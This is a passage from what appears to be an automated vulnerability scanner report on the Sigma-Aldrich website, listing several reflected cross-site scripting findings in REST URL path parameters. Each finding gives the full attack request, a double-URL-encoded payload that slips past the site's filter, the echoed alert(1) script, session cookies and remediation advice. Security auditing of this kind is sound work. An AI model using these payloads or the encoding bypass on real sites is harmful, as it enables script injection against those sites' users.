Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:59 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich63598";alert(1)//06fd2fe8eb1/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.111. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b534%2522%253balert%25281%2529%252f%252f0dadcd087aa was submitted in the REST URL parameter 3. This input was echoed as 3b534";alert(1)//0dadcd087aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest3b534%2522%253balert%25281%2529%252f%252f0dadcd087aa/life-science/functional-genomics-and-rnai/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:01 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest3b534";alert(1)//0dadcd087aa/life-science/functional-genomics-and-rnai/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.112. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66369%2522%253balert%25281%2529%252f%252f24dc9edba80 was submitted in the REST URL parameter 4. This input was echoed as 66369";alert(1)//24dc9edba80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science66369%2522%253balert%25281%2529%252f%252f24dc9edba80/functional-genomics-and-rnai/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science66369";alert(1)//24dc9edba80/functional-genomics-and-rnai/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.113. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 194be%2522%253balert%25281%2529%252f%252f42d1ed28fc9 was submitted in the REST URL parameter 5. This input was echoed as 194be";alert(1)//42d1ed28fc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai194be%2522%253balert%25281%2529%252f%252f42d1ed28fc9/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai194be";alert(1)//42d1ed28fc9/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.114. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a940b%2522%253balert%25281%2529%252f%252f35484a5d8b1 was submitted in the REST URL parameter 6. This input was echoed as a940b";alert(1)//35484a5d8b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrnaa940b%2522%253balert%25281%2529%252f%252f35484a5d8b1/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrnaa940b";alert(1)//35484a5d8b1/custom-services","E404") ;
   </script>
...[SNIP]...

1.115. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d19f8%2522%253balert%25281%2529%252f%252f3ffeaa9c5f6 was submitted in the REST URL parameter 7. This input was echoed as d19f8";alert(1)//3ffeaa9c5f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-servicesd19f8%2522%253balert%25281%2529%252f%252f3ffeaa9c5f6 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
